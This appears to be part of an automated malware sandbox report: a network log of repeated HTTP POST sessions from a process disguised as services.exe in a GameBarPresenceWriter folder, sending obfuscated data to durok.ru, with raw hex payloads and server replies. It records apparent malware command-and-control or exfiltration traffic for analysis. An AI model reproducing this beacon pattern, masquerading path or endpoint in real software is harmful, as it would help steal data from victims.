                                                                                                                              Data Ascii: YX^XTY\V^XRTV]XPT\[ZVPS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+1Z(#" ,-6?7:048 #41-)4@?#$*%"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:21.412446976 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:21.665853977 CET800INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:21 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2ArtAl3hPZXTz%2BVKoAZwgTT1gc2jQmOOdKykDmvxj%2BKurNzcf3TEnlGxaHH4N9LEoEdzm3xNjWvjEOOi%2FtjI1j0Y4Z1zRc0eiCQCRY5sCEROCfQ%2FQNr%2BxbIiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262e2c8c041d9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4329&min_rtt=1604&rtt_var=6052&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=62369&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              68192.168.2.449857104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:22.182106972 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:22.536703110 CET2548OUTData Raw: 59 58 5e 50 54 59 5c 52 5e 58 52 54 56 58 58 5a 54 5c 5b 58 56 50 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX^PTY\R^XRTVXXZT\[XVPSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$\??(:)Q!T78=5)$!3B#[4","Y. <$X+5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:23.347927094 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:23.633919001 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:23 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q1QnFQP0IdrMVt%2BPCzTrTyQPzQRcyvpmyBf2Ke8qCy7XI4ywagOrUM60C7PzX5cA3omnrHtM9gZLLd5Sx77FVRXtWzbXRvYVkdq76VjME%2BPLG6hA%2BHe0Xn2Efg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262eee9354252-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4562&min_rtt=1578&rtt_var=6560&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=57360&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              69192.168.2.449862104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:22.658243895 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:23.005599976 CET2128OUTData Raw: 5c 59 5e 5a 54 5e 59 56 5e 58 52 54 56 5a 58 5a 54 53 5b 5a 56 55 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^ZT^YV^XRTVZXZTS[ZVUSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'?4?-!"$^/1=7=04?7<,V7<2-9<C(Y)"Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:23.836373091 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:24.089777946 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:23 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMVW4zMQWUltS8b7v67K9CH8w%2BI%2B%2FA%2BNxBDjIhThe3fV0EiXCAxMvFcpPaYubyJnhpUU6zzMKBt7htCqOVW2M3CyUaP27BZ4CHxoXImsc1G%2BBFvTFbATvgMzCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262f1ff35efa7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4256&min_rtt=1774&rtt_var=5630&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=67480&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 3e 17 38 0f 23 05 2c 13 3c 3d 2a 1b 2a 31 3a 05 2b 1c 39 5f 2b 3c 22 57 28 38 05 51 23 39 2d 01 3e 3a 20 5c 25 26 36 5a 26 21 2e 5c 05 1d 27 5e 28 05 33 01 30 1c 21 5a 3d 10 22 0a 2a 2d 39 5d 25 2f 3c 04 34 2b 36 5f 22 22 23 02 2c 05 30 1d 2d 3c 09 00 2a 20 32 1f 35 17 21 51 0c 1f 3b 0b 36 07 30 00 25 00 00 0f 36 33 24 08 26 16 08 1f 21 5d 24 0e 33 03 33 5d 26 30 23 1d 23 5b 30 0e 2b 03 00 13 26 59 22 05 29 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$>8#,<=**1:+9_+<"W(8Q#9->: \%&6Z&!.\'^(30!Z="*-9]%/<4+6_""#,0-<* 25!Q;60%63$&!]$33]&0##[0+&Y")%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              70192.168.2.449863104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:23.873538971 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:24.282423973 CET2548OUTData Raw: 59 5f 5e 5c 51 59 59 54 5e 58 52 54 56 5e 58 55 54 55 5b 5a 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^\QYYT^XRTV^XUTU[ZV^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_+!0]?9!!!<X,X5V*'B<#,(4Z.)7>##*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:25.050838947 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:25.308357000 CET806INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:25 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLa1ODdM5mLPdvkH8n4TQ%2BUAk0eV6%2FjQCLBtPkSYAPymd%2B%2BHYHhSlGaYJdwshb2LJy0mqJE3uhR5e4QplO%2BTZ3DS1knM5sZpB%2F4SHliGi4%2Fy0yzjodXmZgLFGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262f98c8f7cf3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=10676&min_rtt=1799&rtt_var=18429&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=20049&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              71192.168.2.449869104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:25.386233091 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:25.740341902 CET2108OUTData Raw: 59 58 5b 58 54 55 59 5b 5e 58 52 54 56 5c 58 55 54 57 5b 5d 56 56 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[XTUY[^XRTV\XUTW[]VVS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_+(_(5V"_;5W>7!04Z4#7,*[9) B(#)5"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:18:26.564126015 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:26.821748972 CET948INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:26 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wfr65p6JE%2F8dH7CyLpQ4InlIqRfzzo05%2FFAEl26lN13tdp5twJwgK5%2FndqSp3u%2BzMl8zYuZM8alf7rZkfDOfdBs58jGMc9WE9C2iFDOZyROIZyZOez0EohmwrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826302fc0d42e2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7222&min_rtt=2021&rtt_var=11160&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=33463&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5d 3d 29 3f 1a 37 2c 30 50 2b 2d 0f 09 3d 0f 0b 5d 28 54 39 5c 28 3f 00 1e 28 28 01 51 34 04 3a 1e 2a 04 0a 5b 31 36 26 59 31 31 2e 5c 05 1d 27 17 3e 2b 0a 13 24 32 2a 02 2b 3d 3d 1a 3d 2e 3a 04 27 59 23 5c 23 5d 2a 15 37 21 3c 5c 2f 5a 33 07 2d 05 34 5a 3f 20 00 12 36 07 21 51 0c 1f 38 54 23 3a 23 5b 31 07 3e 0b 22 0e 28 09 31 38 3a 1d 21 05 3b 1d 27 04 30 05 31 33 06 0e 20 13 28 0b 28 2e 32 5a 26 2f 04 02 2b 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$]=)?7,0P+-=](T9\(?((Q4:*[16&Y11.\'>+$2*+===.:'Y#\#]*7!<\/Z3-4Z? 6!Q8T#:#[1>"(18:!;'013 ((.2Z&/+9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              72192.168.2.449870104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:25.543854952 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:25.896209002 CET2548OUTData Raw: 5c 5e 5e 5a 51 59 59 51 5e 58 52 54 56 5c 58 51 54 53 5b 5a 56 50 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^ZQYYQ^XRTV\XQTS[ZVPS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+2(_?9!68X..**'&'48#/4?2.:(E?#3*"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:18:26.721941948 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:26.973664045 CET806INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:26 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wx170yYXhI%2BUqYq2skf8JKPHgMN%2BNumhZWNGgyxm7wdfQHZ4jm8xh77YoJ8Xgj1AT%2BSsj2ip%2B5zT1pNR%2FL%2Fpmy%2FWQ66uPkfjB1JLFPJa%2BYbOt6srOVik4ufyxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826303f8a27283-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4935&min_rtt=1813&rtt_var=6925&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=54491&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              73192.168.2.449876104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:27.774842024 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              74192.168.2.449877104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:27.954663992 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:28.302345037 CET2128OUTData Raw: 5c 5d 5e 5f 51 59 5c 55 5e 58 52 54 56 58 58 55 54 52 5b 5b 56 54 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \]^_QY\U^XRTVXXUTR[[VTSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'($>9-Q#2(Y,=6?72Z%$,"? Q4!9)$A(++5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:29.132710934 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:29.407362938 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAMcTriiAysZW8o78On8AEPrhA8so7hyMW%2BsYtxN75uUXkYdErMZnbE5nMXnLuy91d3IFNk%2F%2BvRx4neK4t8SXfYVqLZ7tWVaOZdeXfS8J7mbYvn6qZ6eQAe84w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263130ad24384-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8196&min_rtt=1737&rtt_var=13571&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=27332&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 01 2a 39 06 08 23 3f 30 1d 3c 5b 31 08 29 0f 03 17 3f 22 04 06 2b 59 25 0f 3f 01 28 0b 21 29 26 5c 2a 29 27 03 31 0f 32 5c 31 0b 2e 5c 05 1d 24 06 3f 28 23 00 26 31 3d 59 2a 58 22 46 2a 2d 22 05 27 59 34 03 21 28 22 5f 20 1f 2f 05 2f 2f 2c 5a 2e 2c 34 59 3c 56 3e 12 36 3d 21 51 0c 1f 3b 0e 36 2a 20 06 26 2e 0b 54 21 23 34 0e 25 16 2e 10 35 5d 34 08 33 39 20 03 26 0a 27 10 37 3d 2b 1f 28 2d 32 10 31 3f 25 58 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*9#?0<[1)?"+Y%?(!)&\*)'12\1.\$?(#&1=Y*X"F*-"'Y4!("_ ///,Z.,4Y<V>6=!Q;6* &.T!#4%.5]439 &'7=+(-21?%X))%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              75192.168.2.449878104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:28.073951006 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:28.427303076 CET2548OUTData Raw: 59 59 5b 5f 51 59 5c 51 5e 58 52 54 56 5f 58 55 54 57 5b 5a 56 50 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[_QY\Q^XRTV_XUTW[ZVPSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+ ?)%P52 ;.))^0', ,8T#<Z.A<0'*"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:29.261287928 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:29.514007092 CET804INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6EB%2FJ957hD%2Bxh1FO2PRtECPdFVrg3WLtMvLqGhbHKTrT9rD%2FVEymxoQPnt3gls%2B9Q4YwzZ95cIxEhd2rkf8MeZ92nqHWUyqyA4HNybvAOQst4tg%2Fd8%2Fo%2FFG1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826313de067c88-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4103&min_rtt=1959&rtt_var=5024&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=76367&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              76192.168.2.449884104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:29.770255089 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:30.115520954 CET2548OUTData Raw: 59 51 5e 5f 54 5c 5c 56 5e 58 52 54 56 5a 58 5b 54 50 5b 5a 56 56 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^_T\\V^XRTVZX[TP[ZVVSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$\<20>)6X/>):Y%'; U7%-*@+#$)%"Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:30.952878952 CET25INHTTP/1.1 100 Continue
